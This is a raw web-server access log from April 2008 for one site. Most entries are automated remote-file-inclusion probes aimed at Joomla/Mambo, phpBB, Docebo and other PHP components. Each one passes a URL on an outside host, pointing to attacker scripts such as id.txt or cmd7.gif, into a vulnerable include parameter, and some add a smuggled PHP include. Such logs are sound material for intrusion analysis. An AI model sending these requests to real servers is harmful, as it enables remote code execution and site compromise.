209.126.144.75 - - [08/Apr/2008:12:47:36 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:12:47:43 -0700] "GET /index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:12:48:23 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:12:48:23 -0700] "GET //main.php?sayfa=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:12:48:23 -0700] "GET /logs//main.php?sayfa=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:12:49:00 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:12:49:30 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:12:49:30 -0700] "GET //main.php?sayfa=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:12:49:30 -0700] "GET /logs//main.php?sayfa=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:49:35 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:49:36 -0700] "GET /index.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:12:49:58 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:50:35 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:50:35 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:50:35 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:50:35 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:51:09 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.167 - - [08/Apr/2008:12:51:14 -0700] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:12:51:14 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:51:15 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:51:16 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:51:51 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:12:51:51 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:12:52:09 -0700] "GET /logs/access_071201.log/port.php?content=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:52:13 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.206.50 - - [08/Apr/2008:12:52:16 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.206.50 - - [08/Apr/2008:12:52:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tompakovcapital.com/.dat/idscan4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:12:52:18 -0700] "GET /port.php?content=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.154.47 - - [08/Apr/2008:12:52:25 -0700] "GET /index.php?option=com_custompages&cpage=http://www.kingwild.com/echo? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:12:52:26 -0700] "GET /logs/port.php?content=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.152 - - [08/Apr/2008:12:52:28 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.redladys.net/tgp/alat/idscan3? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.162 - - [08/Apr/2008:12:55:50 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.37 - - [08/Apr/2008:12:55:50 -0700] "GET /minamijewelry/html/wind.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:57:45 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:57:46 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:12:57:47 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:12:58:15 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:12:58:15 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:12:58:48 -0700] "GET /logs/access_080226.log/components/com_simpleboard/image_upload.php?sbp=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:12:58:49 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:12:58:49 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:58:52 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.235.56.178 - - [08/Apr/2008:12:58:52 -0700] "GET /index2.php?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
69.61.30.100 - - [08/Apr/2008:13:00:38 -0700] "GET /admin/addons/archive/archive.php?adminfolder=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.61.30.100 - - [08/Apr/2008:13:00:39 -0700] "GET /logs/admin/addons/archive/archive.php?adminfolder=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:13:00:49 -0700] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.148.50 - - [08/Apr/2008:13:00:49 -0700] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
65.36.233.113 - - [08/Apr/2008:13:01:03 -0700] "GET /admin/addons/archive/archive.php?adminfolder=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:13:01:43 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.27.193 - - [08/Apr/2008:13:01:46 -0700] "GET //doceboLms//class/class.dashboard_lms.php?where_framework=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:01:48 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:01:49 -0700] "GET //citywriter/head.php?path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:01:49 -0700] "GET /logs//citywriter/head.php?path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.30.55 - - [08/Apr/2008:13:02:29 -0700] "GET //index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:03:08 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:13:04:17 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:13:04:17 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:07:32 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.27.172 - - [08/Apr/2008:13:07:33 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 12137 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:13:07:59 -0700] "GET /logs/access_080207.log/port.php?content=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [08/Apr/2008:13:08:44 -0700] "GET /logs/?mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 200 42265 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
194.79.75.195 - - [08/Apr/2008:13:08:45 -0700] "GET /?mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 200 7371 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
64.28.184.235 - - [08/Apr/2008:13:09:00 -0700] "GET /logs/access_080312.log//multithumb/multithumb.php?mosConfig_absolute_path=http://emptyhearts.net/mno/ID3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [08/Apr/2008:13:09:00 -0700] "GET //multithumb/multithumb.php?mosConfig_absolute_path=http://emptyhearts.net/mno/ID3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [08/Apr/2008:13:09:01 -0700] "GET /logs//multithumb/multithumb.php?mosConfig_absolute_path=http://emptyhearts.net/mno/ID3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [08/Apr/2008:13:09:22 -0700] "GET /logs/access_080211.log//multithumb/multithumb.php?mosConfig_absolute_path=http://emptyhearts.net/mno/ID3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.65 - - [08/Apr/2008:13:10:25 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.221.88.99 - - [08/Apr/2008:13:10:28 -0700] "GET /logs/?mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 200 42265 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.221.88.99 - - [08/Apr/2008:13:10:30 -0700] "GET /?mosConfig_absolute_path=http://www.partypig.de/components/com_remository_files/cmd7.gif?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
208.1.62.200 - - [08/Apr/2008:13:10:35 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Apr/2008:13:10:37 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Apr/2008:13:10:37 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Apr/2008:13:11:08 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Apr/2008:13:11:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Apr/2008:13:11:10 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:13:11:54 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:13:12:25 -0700] "GET /logs/access_071229.log/@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:13:12:25 -0700] "GET /@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:13:12:26 -0700] "GET /logs/@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:13:12:34 -0700] "GET /logs/access_071229.log/@rfihttp://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:13:12:34 -0700] "GET /@rfihttp://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:13:12:35 -0700] "GET /logs/@rfihttp://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.29 - - [08/Apr/2008:13:12:39 -0700] "GET /logs/access_080219.log/@rfihttp://www.nextlesson.com//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.64.152 - - [08/Apr/2008:13:12:42 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.redladys.net/tgp/alat/idscan3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.152 - - [08/Apr/2008:13:12:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.redladys.net/tgp/alat/idscan3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:13:12:54 -0700] "GET /logs/access_080201.log/@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.108.64.152 - - [08/Apr/2008:13:12:55 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.redladys.net/tgp/alat/idscan3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:13:14:14 -0700] "GET /logs/access_071229.log/@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:13:14:15 -0700] "GET /@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:13:14:18 -0700] "GET /logs/@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:13:14:22 -0700] "GET /logs/access_071229.log/@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:13:14:23 -0700] "GET /@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:13:14:23 -0700] "GET /logs/@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:13:14:31 -0700] "GET /logs/access_080219.log/@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:13:14:34 -0700] "GET /logs/access_080219.log/@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:15:05 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:15:06 -0700] "GET //config/dbutil.bck.php?confdir=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:15:06 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:13:16:18 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:13:16:19 -0700] "GET /index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:13:16:19 -0700] "GET /logs/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:13:16:47 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:13:17:11 -0700] "GET /logs/access_080207.log/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:17:33 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:17:39 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:13:17:40 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [08/Apr/2008:13:18:42 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [08/Apr/2008:13:18:42 -0700] "GET /index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [08/Apr/2008:13:18:42 -0700] "GET /logs/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [08/Apr/2008:13:18:47 -0700] "GET /logs/access_080207.log/index1.php?menu=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.122 - - [08/Apr/2008:13:20:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.27.90 - - [08/Apr/2008:13:20:29 -0700] "GET /logs/access_070920.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.3.139.246 - - [08/Apr/2008:13:20:37 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
202.53.24.188 - - [08/Apr/2008:13:21:08 -0700] "GET /logs/access_080218.log/index2.php?pagina=http://www.thenationalcouncil.com/webcalendar/tools/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
